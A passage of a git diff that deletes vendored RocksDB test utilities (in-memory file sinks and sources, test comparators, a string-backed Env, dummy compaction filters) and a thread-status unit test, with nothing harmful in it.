-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return user_comparator()->Compare(a, b);
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
-    user_comparator()->FindShortestSeparator(start, limit);
-  }
-  virtual void FindShortSuccessor(std::string* key) const override {
-    user_comparator()->FindShortSuccessor(key);
-  }
-};
-
-// A test comparator which compare two strings in this way:
-// (1) first compare prefix of 8 bytes in alphabet order,
-// (2) if two strings share the same prefix, sort the other part of the string
-//     in the reverse alphabet order.
-// This helps simulate the case of compounded key of [entity][timestamp] and
-// latest timestamp first.
-class SimpleSuffixReverseComparator : public Comparator {
- public:
-  SimpleSuffixReverseComparator() {}
-
-  virtual const char* Name() const override {
-    return "SimpleSuffixReverseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    Slice prefix_a = Slice(a.data(), 8);
-    Slice prefix_b = Slice(b.data(), 8);
-    int prefix_comp = prefix_a.compare(prefix_b);
-    if (prefix_comp != 0) {
-      return prefix_comp;
-    } else {
-      Slice suffix_a = Slice(a.data() + 8, a.size() - 8);
-      Slice suffix_b = Slice(b.data() + 8, b.size() - 8);
-      return -(suffix_a.compare(suffix_b));
-    }
-  }
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {}
-
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-// Returns a user key comparator that can be used for comparing two uint64_t
-// slices. Instead of comparing slices byte-wise, it compares all the 8 bytes
-// at once. Assumes same endian-ness is used though the database's lifetime.
-// Symantics of comparison would differ from Bytewise comparator in little
-// endian machines.
-extern const Comparator* Uint64Comparator();
-
-// Iterator over a vector of keys/values
-class VectorIterator : public InternalIterator {
- public:
-  explicit VectorIterator(const std::vector<std::string>& keys)
-      : keys_(keys), current_(keys.size()) {
-    std::sort(keys_.begin(), keys_.end());
-    values_.resize(keys.size());
-  }
-
-  VectorIterator(const std::vector<std::string>& keys,
-      const std::vector<std::string>& values)
-    : keys_(keys), values_(values), current_(keys.size()) {
-    assert(keys_.size() == values_.size());
-  }
-
-  virtual bool Valid() const override { return current_ < keys_.size(); }
-
-  virtual void SeekToFirst() override { current_ = 0; }
-  virtual void SeekToLast() override { current_ = keys_.size() - 1; }
-
-  virtual void Seek(const Slice& target) override {
-    current_ = std::lower_bound(keys_.begin(), keys_.end(), target.ToString()) -
-               keys_.begin();
-  }
-
-  virtual void SeekForPrev(const Slice& target) override {
-    current_ = std::upper_bound(keys_.begin(), keys_.end(), target.ToString()) -
-               keys_.begin();
-    if (!Valid()) {
-      SeekToLast();
-    } else {
-      Prev();
-    }
-  }
-
-  virtual void Next() override { current_++; }
-  virtual void Prev() override { current_--; }
-
-  virtual Slice key() const override { return Slice(keys_[current_]); }
-  virtual Slice value() const override { return Slice(values_[current_]); }
-
-  virtual Status status() const override { return Status::OK(); }
-
- private:
-  std::vector<std::string> keys_;
-  std::vector<std::string> values_;
-  size_t current_;
-};
-extern WritableFileWriter* GetWritableFileWriter(WritableFile* wf);
-
-extern RandomAccessFileReader* GetRandomAccessFileReader(RandomAccessFile* raf);
-
-extern SequentialFileReader* GetSequentialFileReader(SequentialFile* se);
-
-class StringSink: public WritableFile {
- public:
-  std::string contents_;
-
-  explicit StringSink(Slice* reader_contents = nullptr) :
-      WritableFile(),
-      contents_(""),
-      reader_contents_(reader_contents),
-      last_flush_(0) {
-    if (reader_contents_ != nullptr) {
-      *reader_contents_ = Slice(contents_.data(), 0);
-    }
-  }
-
-  const std::string& contents() const { return contents_; }
-
-  virtual Status Truncate(uint64_t size) override {
-    contents_.resize(static_cast<size_t>(size));
-    return Status::OK();
-  }
-  virtual Status Close() override { return Status::OK(); }
-  virtual Status Flush() override {
-    if (reader_contents_ != nullptr) {
-      assert(reader_contents_->size() <= last_flush_);
-      size_t offset = last_flush_ - reader_contents_->size();
-      *reader_contents_ = Slice(
-          contents_.data() + offset,
-          contents_.size() - offset);
-      last_flush_ = contents_.size();
-    }
-
-    return Status::OK();
-  }
-  virtual Status Sync() override { return Status::OK(); }
-  virtual Status Append(const Slice& slice) override {
-    contents_.append(slice.data(), slice.size());
-    return Status::OK();
-  }
-  void Drop(size_t bytes) {
-    if (reader_contents_ != nullptr) {
-      contents_.resize(contents_.size() - bytes);
-      *reader_contents_ = Slice(
-          reader_contents_->data(), reader_contents_->size() - bytes);
-      last_flush_ = contents_.size();
-    }
-  }
-
- private:
-  Slice* reader_contents_;
-  size_t last_flush_;
-};
-
-// A wrapper around a StringSink to give it a RandomRWFile interface
-class RandomRWStringSink : public RandomRWFile {
- public:
-  explicit RandomRWStringSink(StringSink* ss) : ss_(ss) {}
-
-  Status Write(uint64_t offset, const Slice& data) {
-    if (offset + data.size() > ss_->contents_.size()) {
-      ss_->contents_.resize(offset + data.size(), '\0');
-    }
-
-    char* pos = const_cast<char*>(ss_->contents_.data() + offset);
-    memcpy(pos, data.data(), data.size());
-    return Status::OK();
-  }
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const {
-    *result = Slice(nullptr, 0);
-    if (offset < ss_->contents_.size()) {
-      size_t str_res_sz =
-          std::min(static_cast<size_t>(ss_->contents_.size() - offset), n);
-      *result = Slice(ss_->contents_.data() + offset, str_res_sz);
-    }
-    return Status::OK();
-  }
-
-  Status Flush() { return Status::OK(); }
-
-  Status Sync() { return Status::OK(); }
-
-  Status Close() { return Status::OK(); }
-
-  const std::string& contents() const { return ss_->contents(); }
-
- private:
-  StringSink* ss_;
-};
-
-// Like StringSink, this writes into a string.  Unlink StringSink, it
-// has some initial content and overwrites it, just like a recycled
-// log file.
-class OverwritingStringSink : public WritableFile {
- public:
-  explicit OverwritingStringSink(Slice* reader_contents)
-      : WritableFile(),
-        contents_(""),
-        reader_contents_(reader_contents),
-        last_flush_(0) {}
-
-  const std::string& contents() const { return contents_; }
-
-  virtual Status Truncate(uint64_t size) override {
-    contents_.resize(static_cast<size_t>(size));
-    return Status::OK();
-  }
-  virtual Status Close() override { return Status::OK(); }
-  virtual Status Flush() override {
-    if (last_flush_ < contents_.size()) {
-      assert(reader_contents_->size() >= contents_.size());
-      memcpy((char*)reader_contents_->data() + last_flush_,
-             contents_.data() + last_flush_, contents_.size() - last_flush_);
-      last_flush_ = contents_.size();
-    }
-    return Status::OK();
-  }
-  virtual Status Sync() override { return Status::OK(); }
-  virtual Status Append(const Slice& slice) override {
-    contents_.append(slice.data(), slice.size());
-    return Status::OK();
-  }
-  void Drop(size_t bytes) {
-    contents_.resize(contents_.size() - bytes);
-    if (last_flush_ > contents_.size()) last_flush_ = contents_.size();
-  }
-
- private:
-  std::string contents_;
-  Slice* reader_contents_;
-  size_t last_flush_;
-};
-
-class StringSource: public RandomAccessFile {
- public:
-  explicit StringSource(const Slice& contents, uint64_t uniq_id = 0,
-                        bool mmap = false)
-      : contents_(contents.data(), contents.size()),
-        uniq_id_(uniq_id),
-        mmap_(mmap),
-        total_reads_(0) {}
-
-  virtual ~StringSource() { }
-
-  uint64_t Size() const { return contents_.size(); }
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-      char* scratch) const override {
-    total_reads_++;
-    if (offset > contents_.size()) {
-      return Status::InvalidArgument("invalid Read offset");
-    }
-    if (offset + n > contents_.size()) {
-      n = contents_.size() - static_cast<size_t>(offset);
-    }
-    if (!mmap_) {
-      memcpy(scratch, &contents_[static_cast<size_t>(offset)], n);
-      *result = Slice(scratch, n);
-    } else {
-      *result = Slice(&contents_[static_cast<size_t>(offset)], n);
-    }
-    return Status::OK();
-  }
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override {
-    if (max_size < 20) {
-      return 0;
-    }
-
-    char* rid = id;
-    rid = EncodeVarint64(rid, uniq_id_);
-    rid = EncodeVarint64(rid, 0);
-    return static_cast<size_t>(rid-id);
-  }
-
-  int total_reads() const { return total_reads_; }
-
-  void set_total_reads(int tr) { total_reads_ = tr; }
-
- private:
-  std::string contents_;
-  uint64_t uniq_id_;
-  bool mmap_;
-  mutable int total_reads_;
-};
-
-class NullLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {}
-  virtual size_t GetLogFileSize() const override { return 0; }
-};
-
-// Corrupts key by changing the type
-extern void CorruptKeyType(InternalKey* ikey);
-
-extern std::string KeyStr(const std::string& user_key,
-                          const SequenceNumber& seq, const ValueType& t,
-                          bool corrupt = false);
-
-class SleepingBackgroundTask {
- public:
-  SleepingBackgroundTask()
-      : bg_cv_(&mutex_),
-        should_sleep_(true),
-        done_with_sleep_(false),
-        sleeping_(false) {}
-
-  bool IsSleeping() {
-    MutexLock l(&mutex_);
-    return sleeping_;
-  }
-  void DoSleep() {
-    MutexLock l(&mutex_);
-    sleeping_ = true;
-    bg_cv_.SignalAll();
-    while (should_sleep_) {
-      bg_cv_.Wait();
-    }
-    sleeping_ = false;
-    done_with_sleep_ = true;
-    bg_cv_.SignalAll();
-  }
-  void WaitUntilSleeping() {
-    MutexLock l(&mutex_);
-    while (!sleeping_ || !should_sleep_) {
-      bg_cv_.Wait();
-    }
-  }
-  void WakeUp() {
-    MutexLock l(&mutex_);
-    should_sleep_ = false;
-    bg_cv_.SignalAll();
-  }
-  void WaitUntilDone() {
-    MutexLock l(&mutex_);
-    while (!done_with_sleep_) {
-      bg_cv_.Wait();
-    }
-  }
-  bool WokenUp() {
-    MutexLock l(&mutex_);
-    return should_sleep_ == false;
-  }
-
-  void Reset() {
-    MutexLock l(&mutex_);
-    should_sleep_ = true;
-    done_with_sleep_ = false;
-  }
-
-  static void DoSleepTask(void* arg) {
-    reinterpret_cast<SleepingBackgroundTask*>(arg)->DoSleep();
-  }
-
- private:
-  port::Mutex mutex_;
-  port::CondVar bg_cv_;  // Signalled when background work finishes
-  bool should_sleep_;
-  bool done_with_sleep_;
-  bool sleeping_;
-};
-
-// Filters merge operands and values that are equal to `num`.
-class FilterNumber : public CompactionFilter {
- public:
-  explicit FilterNumber(uint64_t num) : num_(num) {}
-
-  std::string last_merge_operand_key() { return last_merge_operand_key_; }
-
-  bool Filter(int level, const rocksdb::Slice& key, const rocksdb::Slice& value,
-              std::string* new_value, bool* value_changed) const override {
-    if (value.size() == sizeof(uint64_t)) {
-      return num_ == DecodeFixed64(value.data());
-    }
-    return true;
-  }
-
-  bool FilterMergeOperand(int level, const rocksdb::Slice& key,
-                          const rocksdb::Slice& value) const override {
-    last_merge_operand_key_ = key.ToString();
-    if (value.size() == sizeof(uint64_t)) {
-      return num_ == DecodeFixed64(value.data());
-    }
-    return true;
-  }
-
-  const char* Name() const override { return "FilterBadMergeOperand"; }
-
- private:
-  mutable std::string last_merge_operand_key_;
-  uint64_t num_;
-};
-
-inline std::string EncodeInt(uint64_t x) {
-  std::string result;
-  PutFixed64(&result, x);
-  return result;
-}
-
-class StringEnv : public EnvWrapper {
- public:
-  class SeqStringSource : public SequentialFile {
-   public:
-    explicit SeqStringSource(const std::string& data)
-        : data_(data), offset_(0) {}
-    ~SeqStringSource() {}
-    Status Read(size_t n, Slice* result, char* scratch) override {
-      std::string output;
-      if (offset_ < data_.size()) {
-        n = std::min(data_.size() - offset_, n);
-        memcpy(scratch, data_.data() + offset_, n);
-        offset_ += n;
-        *result = Slice(scratch, n);
-      } else {
-        return Status::InvalidArgument(
-            "Attemp to read when it already reached eof.");
-      }
-      return Status::OK();
-    }
-    Status Skip(uint64_t n) override {
-      if (offset_ >= data_.size()) {
-        return Status::InvalidArgument(
-            "Attemp to read when it already reached eof.");
-      }
-      // TODO(yhchiang): Currently doesn't handle the overflow case.
-      offset_ += n;
-      return Status::OK();
-    }
-
-   private:
-    std::string data_;
-    size_t offset_;
-  };
-
-  class StringSink : public WritableFile {
-   public:
-    explicit StringSink(std::string* contents)
-        : WritableFile(), contents_(contents) {}
-    virtual Status Truncate(uint64_t size) override {
-      contents_->resize(size);
-      return Status::OK();
-    }
-    virtual Status Close() override { return Status::OK(); }
-    virtual Status Flush() override { return Status::OK(); }
-    virtual Status Sync() override { return Status::OK(); }
-    virtual Status Append(const Slice& slice) override {
-      contents_->append(slice.data(), slice.size());
-      return Status::OK();
-    }
-
-   private:
-    std::string* contents_;
-  };
-
-  explicit StringEnv(Env* t) : EnvWrapper(t) {}
-  virtual ~StringEnv() {}
-
-  const std::string& GetContent(const std::string& f) { return files_[f]; }
-
-  const Status WriteToNewFile(const std::string& file_name,
-                              const std::string& content) {
-    unique_ptr<WritableFile> r;
-    auto s = NewWritableFile(file_name, &r, EnvOptions());
-    if (!s.ok()) {
-      return s;
-    }
-    r->Append(content);
-    r->Flush();
-    r->Close();
-    assert(files_[file_name] == content);
-    return Status::OK();
-  }
-
-  // The following text is boilerplate that forwards all methods to target()
-  Status NewSequentialFile(const std::string& f, unique_ptr<SequentialFile>* r,
-                           const EnvOptions& options) override {
-    auto iter = files_.find(f);
-    if (iter == files_.end()) {
-      return Status::NotFound("The specified file does not exist", f);
-    }
-    r->reset(new SeqStringSource(iter->second));
-    return Status::OK();
-  }
-  Status NewRandomAccessFile(const std::string& f,
-                             unique_ptr<RandomAccessFile>* r,
-                             const EnvOptions& options) override {
-    return Status::NotSupported();
-  }
-  Status NewWritableFile(const std::string& f, unique_ptr<WritableFile>* r,
-                         const EnvOptions& options) override {
-    auto iter = files_.find(f);
-    if (iter != files_.end()) {
-      return Status::IOError("The specified file already exists", f);
-    }
-    r->reset(new StringSink(&files_[f]));
-    return Status::OK();
-  }
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    return Status::NotSupported();
-  }
-  Status FileExists(const std::string& f) override {
-    if (files_.find(f) == files_.end()) {
-      return Status::NotFound();
-    }
-    return Status::OK();
-  }
-  Status GetChildren(const std::string& dir,
-                     std::vector<std::string>* r) override {
-    return Status::NotSupported();
-  }
-  Status DeleteFile(const std::string& f) override {
-    files_.erase(f);
-    return Status::OK();
-  }
-  Status CreateDir(const std::string& d) override {
-    return Status::NotSupported();
-  }
-  Status CreateDirIfMissing(const std::string& d) override {
-    return Status::NotSupported();
-  }
-  Status DeleteDir(const std::string& d) override {
-    return Status::NotSupported();
-  }
-  Status GetFileSize(const std::string& f, uint64_t* s) override {
-    auto iter = files_.find(f);
-    if (iter == files_.end()) {
-      return Status::NotFound("The specified file does not exist:", f);
-    }
-    *s = iter->second.size();
-    return Status::OK();
-  }
-
-  Status GetFileModificationTime(const std::string& fname,
-                                 uint64_t* file_mtime) override {
-    return Status::NotSupported();
-  }
-
-  Status RenameFile(const std::string& s, const std::string& t) override {
-    return Status::NotSupported();
-  }
-
-  Status LinkFile(const std::string& s, const std::string& t) override {
-    return Status::NotSupported();
-  }
-
-  Status LockFile(const std::string& f, FileLock** l) override {
-    return Status::NotSupported();
-  }
-
-  Status UnlockFile(FileLock* l) override { return Status::NotSupported(); }
-
- protected:
-  std::unordered_map<std::string, std::string> files_;
-};
-
-// Randomly initialize the given DBOptions
-void RandomInitDBOptions(DBOptions* db_opt, Random* rnd);
-
-// Randomly initialize the given ColumnFamilyOptions
-// Note that the caller is responsible for releasing non-null
-// cf_opt->compaction_filter.
-void RandomInitCFOptions(ColumnFamilyOptions* cf_opt, Random* rnd);
-
-// A dummy merge operator which can change its name
-class ChanglingMergeOperator : public MergeOperator {
- public:
-  explicit ChanglingMergeOperator(const std::string& name)
-      : name_(name + "MergeOperator") {}
-  ~ChanglingMergeOperator() {}
-
-  void SetName(const std::string& name) { name_ = name; }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    return false;
-  }
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    return false;
-  }
-  virtual const char* Name() const override { return name_.c_str(); }
-
- protected:
-  std::string name_;
-};
-
-// Returns a dummy merge operator with random name.
-MergeOperator* RandomMergeOperator(Random* rnd);
-
-// A dummy compaction filter which can change its name
-class ChanglingCompactionFilter : public CompactionFilter {
- public:
-  explicit ChanglingCompactionFilter(const std::string& name)
-      : name_(name + "CompactionFilter") {}
-  ~ChanglingCompactionFilter() {}
-
-  void SetName(const std::string& name) { name_ = name; }
-
-  bool Filter(int level, const Slice& key, const Slice& existing_value,
-              std::string* new_value, bool* value_changed) const override {
-    return false;
-  }
-
-  const char* Name() const override { return name_.c_str(); }
-
- private:
-  std::string name_;
-};
-
-// Returns a dummy compaction filter with a random name.
-CompactionFilter* RandomCompactionFilter(Random* rnd);
-
-// A dummy compaction filter factory which can change its name
-class ChanglingCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  explicit ChanglingCompactionFilterFactory(const std::string& name)
-      : name_(name + "CompactionFilterFactory") {}
-  ~ChanglingCompactionFilterFactory() {}
-
-  void SetName(const std::string& name) { name_ = name; }
-
-  std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>();
-  }
-
-  // Returns a name that identifies this compaction filter factory.
-  const char* Name() const override { return name_.c_str(); }
-
- protected:
-  std::string name_;
-};
-
-CompressionType RandomCompressionType(Random* rnd);
-
-void RandomCompressionTypeVector(const size_t count,
-                                 std::vector<CompressionType>* types,
-                                 Random* rnd);
-
-CompactionFilterFactory* RandomCompactionFilterFactory(Random* rnd);
-
-const SliceTransform* RandomSliceTransform(Random* rnd, int pre_defined = -1);
-
-TableFactory* RandomTableFactory(Random* rnd, int pre_defined = -1);
-
-std::string RandomName(Random* rnd, const size_t len);
-
-Status DestroyDir(Env* env, const std::string& dir);
-
-}  // namespace test
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/thread_list_test.cc b/thirdparty/rocksdb/util/thread_list_test.cc
deleted file mode 100644
index 36a221b..0000000
--- a/thirdparty/rocksdb/util/thread_list_test.cc
+++ /dev/null
@@ -1,352 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <mutex>
-#include <condition_variable>
-
-#include "monitoring/thread_status_updater.h"
-#include "rocksdb/db.h"
-#include "util/testharness.h"
-
-#ifdef ROCKSDB_USING_THREAD_STATUS
-
-namespace rocksdb {
-
-class SimulatedBackgroundTask {
- public:
-  SimulatedBackgroundTask(
-      const void* db_key, const std::string& db_name,
-      const void* cf_key, const std::string& cf_name,
-      const ThreadStatus::OperationType operation_type =
-          ThreadStatus::OP_UNKNOWN,
-      const ThreadStatus::StateType state_type =
-          ThreadStatus::STATE_UNKNOWN)
-      : db_key_(db_key), db_name_(db_name),
-        cf_key_(cf_key), cf_name_(cf_name),
-        operation_type_(operation_type), state_type_(state_type),
-        should_run_(true), running_count_(0) {
-    Env::Default()->GetThreadStatusUpdater()->NewColumnFamilyInfo(
-        db_key_, db_name_, cf_key_, cf_name_);
-  }
-
-  ~SimulatedBackgroundTask() {
-    Env::Default()->GetThreadStatusUpdater()->EraseDatabaseInfo(db_key_);
-  }
-
-  void Run() {
-    std::unique_lock<std::mutex> l(mutex_);
-    running_count_++;
-    Env::Default()->GetThreadStatusUpdater()->SetColumnFamilyInfoKey(cf_key_);
-    Env::Default()->GetThreadStatusUpdater()->SetThreadOperation(
-        operation_type_);
-    Env::Default()->GetThreadStatusUpdater()->SetThreadState(state_type_);
-    while (should_run_) {
-      bg_cv_.wait(l);
-    }
-    Env::Default()->GetThreadStatusUpdater()->ClearThreadState();
-    Env::Default()->GetThreadStatusUpdater()->ClearThreadOperation();
-    Env::Default()->GetThreadStatusUpdater()->SetColumnFamilyInfoKey(0);
-    running_count_--;
-    bg_cv_.notify_all();
-  }
-
-  void FinishAllTasks() {
-    std::unique_lock<std::mutex> l(mutex_);
-    should_run_ = false;
-    bg_cv_.notify_all();
-  }
-
-  void WaitUntilScheduled(int job_count, Env* env) {
-    while (running_count_ < job_count) {
-      env->SleepForMicroseconds(1000);
-    }
-  }
-
-  void WaitUntilDone() {
-    std::unique_lock<std::mutex> l(mutex_);
-    while (running_count_ > 0) {
-      bg_cv_.wait(l);
-    }
-  }
-
-  static void DoSimulatedTask(void* arg) {
-    reinterpret_cast<SimulatedBackgroundTask*>(arg)->Run();
-  }
-
- private:
-  const void* db_key_;
-  const std::string db_name_;
-  const void* cf_key_;
-  const std::string cf_name_;
-  const ThreadStatus::OperationType operation_type_;
-  const ThreadStatus::StateType state_type_;
-  std::mutex mutex_;
-  std::condition_variable bg_cv_;
-  bool should_run_;
-  std::atomic<int> running_count_;
-};
-
-class ThreadListTest : public testing::Test {
- public:
-  ThreadListTest() {
-  }
-};
-
-TEST_F(ThreadListTest, GlobalTables) {
-  // verify the global tables for operations and states are properly indexed.
-  for (int type = 0; type != ThreadStatus::NUM_OP_TYPES; ++type) {
-    ASSERT_EQ(global_operation_table[type].type, type);
-    ASSERT_EQ(global_operation_table[type].name,
-              ThreadStatus::GetOperationName(
-                  ThreadStatus::OperationType(type)));
-  }
-
-  for (int type = 0; type != ThreadStatus::NUM_STATE_TYPES; ++type) {
-    ASSERT_EQ(global_state_table[type].type, type);
-    ASSERT_EQ(global_state_table[type].name,
-              ThreadStatus::GetStateName(
-                  ThreadStatus::StateType(type)));
-  }
-
-  for (int stage = 0; stage != ThreadStatus::NUM_OP_STAGES; ++stage) {
-    ASSERT_EQ(global_op_stage_table[stage].stage, stage);
-    ASSERT_EQ(global_op_stage_table[stage].name,
-              ThreadStatus::GetOperationStageName(
-                  ThreadStatus::OperationStage(stage)));
-  }
-}
-
-TEST_F(ThreadListTest, SimpleColumnFamilyInfoTest) {
-  Env* env = Env::Default();
-  const int kHighPriorityThreads = 3;
-  const int kLowPriorityThreads = 5;
-  const int kSimulatedHighPriThreads = kHighPriorityThreads - 1;
-  const int kSimulatedLowPriThreads = kLowPriorityThreads / 3;
-  env->SetBackgroundThreads(kHighPriorityThreads, Env::HIGH);
-  env->SetBackgroundThreads(kLowPriorityThreads, Env::LOW);
-
-  SimulatedBackgroundTask running_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu");
-
-  for (int test = 0; test < kSimulatedHighPriThreads; ++test) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &running_task, Env::Priority::HIGH);
-  }
-  for (int test = 0; test < kSimulatedLowPriThreads; ++test) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &running_task, Env::Priority::LOW);
-  }
-  running_task.WaitUntilScheduled(
-      kSimulatedHighPriThreads + kSimulatedLowPriThreads, env);
-
-  std::vector<ThreadStatus> thread_list;
-
-  // Verify the number of running threads in each pool.
-  env->GetThreadList(&thread_list);
-  int running_count[ThreadStatus::NUM_THREAD_TYPES] = {0};
-  for (auto thread_status : thread_list) {
-    if (thread_status.cf_name == "pikachu" &&
-        thread_status.db_name == "running") {
-      running_count[thread_status.thread_type]++;
-    }
-  }
-  ASSERT_EQ(
-      running_count[ThreadStatus::HIGH_PRIORITY],
-      kSimulatedHighPriThreads);
-  ASSERT_EQ(
-      running_count[ThreadStatus::LOW_PRIORITY],
-      kSimulatedLowPriThreads);
-  ASSERT_EQ(
-      running_count[ThreadStatus::USER], 0);
-
-  running_task.FinishAllTasks();
-  running_task.WaitUntilDone();
-
-  // Verify none of the threads are running
-  env->GetThreadList(&thread_list);
-
-  for (int i = 0; i < ThreadStatus::NUM_THREAD_TYPES; ++i) {
-    running_count[i] = 0;
-  }
-  for (auto thread_status : thread_list) {
-    if (thread_status.cf_name == "pikachu" &&
-        thread_status.db_name == "running") {
-      running_count[thread_status.thread_type]++;
-    }
-  }
-
-  ASSERT_EQ(
-      running_count[ThreadStatus::HIGH_PRIORITY], 0);
-  ASSERT_EQ(
-      running_count[ThreadStatus::LOW_PRIORITY], 0);
-  ASSERT_EQ(
-      running_count[ThreadStatus::USER], 0);
-}
-
-namespace {
-  void UpdateStatusCounts(
-      const std::vector<ThreadStatus>& thread_list,
-      int operation_counts[], int state_counts[]) {
-    for (auto thread_status : thread_list) {
-      operation_counts[thread_status.operation_type]++;
-      state_counts[thread_status.state_type]++;
-    }
-  }
-
-  void VerifyAndResetCounts(
-      const int correct_counts[], int collected_counts[], int size) {
-    for (int i = 0; i < size; ++i) {
-      ASSERT_EQ(collected_counts[i], correct_counts[i]);
-      collected_counts[i] = 0;
-    }
-  }
-
-  void UpdateCount(
-      int operation_counts[], int from_event, int to_event, int amount) {
-    operation_counts[from_event] -= amount;
-    operation_counts[to_event] += amount;
-  }
-}  // namespace
-
-TEST_F(ThreadListTest, SimpleEventTest) {
-  Env* env = Env::Default();
-
-  // simulated tasks
-  const int kFlushWriteTasks = 3;
-  SimulatedBackgroundTask flush_write_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_FLUSH);
-
-  const int kCompactionWriteTasks = 4;
-  SimulatedBackgroundTask compaction_write_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_COMPACTION);
-
-  const int kCompactionReadTasks = 5;
-  SimulatedBackgroundTask compaction_read_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_COMPACTION);
-
-  const int kCompactionWaitTasks = 6;
-  SimulatedBackgroundTask compaction_wait_task(
-      reinterpret_cast<void*>(1234), "running",
-      reinterpret_cast<void*>(5678), "pikachu",
-      ThreadStatus::OP_COMPACTION);
-
-  // setup right answers
-  int correct_operation_counts[ThreadStatus::NUM_OP_TYPES] = {0};
-  correct_operation_counts[ThreadStatus::OP_FLUSH] =
-      kFlushWriteTasks;
-  correct_operation_counts[ThreadStatus::OP_COMPACTION] =
-      kCompactionWriteTasks + kCompactionReadTasks + kCompactionWaitTasks;
-
-  env->SetBackgroundThreads(
-      correct_operation_counts[ThreadStatus::OP_FLUSH], Env::HIGH);
-  env->SetBackgroundThreads(
-      correct_operation_counts[ThreadStatus::OP_COMPACTION], Env::LOW);
-
-  // schedule the simulated tasks
-  for (int t = 0; t < kFlushWriteTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &flush_write_task, Env::Priority::HIGH);
-  }
-  flush_write_task.WaitUntilScheduled(kFlushWriteTasks, env);
-
-  for (int t = 0; t < kCompactionWriteTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &compaction_write_task, Env::Priority::LOW);
-  }
-  compaction_write_task.WaitUntilScheduled(kCompactionWriteTasks, env);
-
-  for (int t = 0; t < kCompactionReadTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &compaction_read_task, Env::Priority::LOW);
-  }
-  compaction_read_task.WaitUntilScheduled(kCompactionReadTasks, env);
-
-  for (int t = 0; t < kCompactionWaitTasks; ++t) {
-    env->Schedule(&SimulatedBackgroundTask::DoSimulatedTask,
-        &compaction_wait_task, Env::Priority::LOW);
-  }
-  compaction_wait_task.WaitUntilScheduled(kCompactionWaitTasks, env);
-
-  // verify the thread-status
-  int operation_counts[ThreadStatus::NUM_OP_TYPES] = {0};
-  int state_counts[ThreadStatus::NUM_STATE_TYPES] = {0};
-
-  std::vector<ThreadStatus> thread_list;
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate compaction-wait tasks and see if the thread-status
-  // reflects this update
-  compaction_wait_task.FinishAllTasks();
-  compaction_wait_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_COMPACTION,
-              ThreadStatus::OP_UNKNOWN, kCompactionWaitTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate flush-write tasks and see if the thread-status
-  // reflects this update
-  flush_write_task.FinishAllTasks();
-  flush_write_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_FLUSH,
-              ThreadStatus::OP_UNKNOWN, kFlushWriteTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate compaction-write tasks and see if the thread-status
-  // reflects this update
-  compaction_write_task.FinishAllTasks();
-  compaction_write_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_COMPACTION,
-              ThreadStatus::OP_UNKNOWN, kCompactionWriteTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-
-  // terminate compaction-write tasks and see if the thread-status
-  // reflects this update
-  compaction_read_task.FinishAllTasks();
-  compaction_read_task.WaitUntilDone();
-  UpdateCount(correct_operation_counts, ThreadStatus::OP_COMPACTION,
-              ThreadStatus::OP_UNKNOWN, kCompactionReadTasks);
-
-  env->GetThreadList(&thread_list);
-  UpdateStatusCounts(thread_list, operation_counts, state_counts);
-  VerifyAndResetCounts(correct_operation_counts, operation_counts,
-                       ThreadStatus::NUM_OP_TYPES);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
